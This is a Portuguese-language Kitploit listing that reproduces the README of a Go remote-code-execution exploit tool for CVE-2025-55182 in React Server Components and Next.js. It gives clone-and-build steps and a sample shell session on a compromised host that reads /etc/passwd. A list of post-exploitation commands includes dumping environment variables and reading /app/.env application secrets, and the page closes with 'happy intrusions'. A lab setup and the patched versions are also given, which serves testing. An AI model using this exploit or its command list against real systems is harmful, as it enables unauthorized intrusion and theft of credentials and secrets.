Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Ferramenta de exploração de RCE direcionada a CVE-2025-55182, uma vulnerabilidade crítica em React Server Components (RSC) que afeta React 19.0.0 - 19.2.0 e aplicativos Next.js. | Kitploit
Ferramentas/GitHubGitHub/yyax13/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleRed TeamingDesenvolvimento de Payloads
GitHubyyax13/cve-2025-55182

CVE-2025-55182

Ferramenta de exploração de RCE direcionada a CVE-2025-55182, uma vulnerabilidade crítica em React Server Components (RSC) que afeta React 19.0.0 - 19.2.0 e aplicativos Next.js.

Ver Repositório
1há 8 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

👻 Exploração Go CVE-2025-55182

Ferramenta interativa de exploração RCE para CVE-2025-55182 (React Server Components)

GitHub Stars License Go

🎯 O que é isso?

CVE-2025-55182 é uma ferramenta mínima e interativa de exploração RCE direcionada à CVE-2025-55182, uma vulnerabilidade crítica em React Server Components (RSC) que afeta React 19.0.0 - 19.2.0 e aplicações Next.js.


📦 Instalação

Pré-requisitos

  • Go 1.18 ou superior
  • Um alvo vulnerável executando React 19.0.0 - 19.2.0

Compilar a partir do código fonte

root@kitploit:~
git clone https://github.com/Hghost0x00/CVE-2025-55182.git
cd CVE-2025-55182
go build -o CVE-2025-55182 main.go

🚀 Uso

Uso básico

root@kitploit:~
./CVE-2025-55182

Sessão interativa

root@kitploit:~
_____________   _______________         _______________   ________   .________          .________.____________  ______  ________  
╲_   ___ ╲   ╲ ╱   ╱╲_   _____╱         ╲_____  ╲   _  ╲  ╲_____  ╲  │   ____╱          │   ____╱│   ____╱_   │╱  __  ╲ ╲_____  ╲ 
╱    ╲  ╲╱╲   Y   ╱  │    __)_   ______  ╱  ____╱  ╱_╲  ╲  ╱  ____╱  │____  ╲   ______  │____  ╲ │____  ╲ │   │>      <  ╱  ____╱ 
╲     ╲____╲     ╱   │        ╲ ╱_____╱ ╱       ╲  ╲_╱   ╲╱       ╲  ╱       ╲ ╱_____╱  ╱       ╲╱       ╲│   ╱   ──   ╲╱       ╲ 
 ╲______  ╱ ╲___╱   ╱_______  ╱         ╲_______ ╲_____  ╱╲_______ ╲╱______  ╱         ╱______  ╱______  ╱│___╲______  ╱╲_______ ╲
        ╲╱                  ╲╱                  ╲╱     ╲╱         ╲╱       ╲╱                 ╲╱       ╲╱            ╲╱         ╲╱  

    React2Shell RCE | CVE-2025-55182
    @hghost010

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[?] Target: localhost:3000
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[+] VULNERABLE
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

ghost@rce $ id
uid=1000(node) gid=1000(node) groups=1000(node)

ghost@rce $ whoami
node

ghost@rce $ pwd
/app

ghost@rce $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash

ghost@rce $ exit

🎥 Demonstração

https://github.com/user-attachments/assets/9cfdc436-9217-4921-bdbd-1368378f049f


Versões afetadas:

  • React 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Aplicações Next.js que utilizam estas versões do React

Versões corrigidas:

  • React 19.2.1+
  • Next.js com dependência React atualizada

🧪 Configuração do Laboratório de Teste

Quer testar isto com segurança? Configure um ambiente de laboratório vulnerável:

root@kitploit:~
# Clone vulnerable Next.js app
git clone https://github.com/zack0x01/vuln-app-CVE-2025-55182.git
cd vuln-app-CVE-2025-55182

# Install and run
npm install --legacy-peer-deps
npm run dev

# In another terminal, run ghost-scanner
./CVE-2025-55182
# Enter: localhost:3000

📚 Comandos comuns

root@kitploit:~
ghost@rce $ id                    # Check user privileges
ghost@rce $ whoami                # Current username
ghost@rce $ pwd                   # Current directory
ghost@rce $ ls -la                # List files
ghost@rce $ cat /etc/passwd       # Read files
ghost@rce $ uname -a              # System information
ghost@rce $ env                   # Environment variables
ghost@rce $ ps aux                # Running processes
ghost@rce $ netstat -tulpn        # Network connections
ghost@rce $ cat /app/.env         # Application secrets

📊 Estatísticas do Repositório

GitHub repo size GitHub last commit GitHub issues


🔗 Referências

  • Detalhes do CVE-2025-55182
  • Aviso de Segurança do React
  • Aviso de Segurança do Next.js
  • PoC Original por maple3142
  • Pesquisa da Assetnote
  • Aplicação de Teste Vulnerável

💬 Comunidade e Suporte

  • 🐦 Twitter/X: @hghost010
  • 🐙 GitHub: Hghost0x00

Encontrou um bug? Abra uma issue


⭐ Mostre seu Apoio

Se esta ferramenta te ajudou:

  • ⭐ Dê uma estrela neste repositório
  • 💬 Compartilhe com outros

📝 Licença

Este projeto está licenciado sob a Licença MIT - veja o arquivo LICENSE para detalhes.


Feito com 👻 por Hghost0x00
Boas invasões ⚡

Baixar ferramenta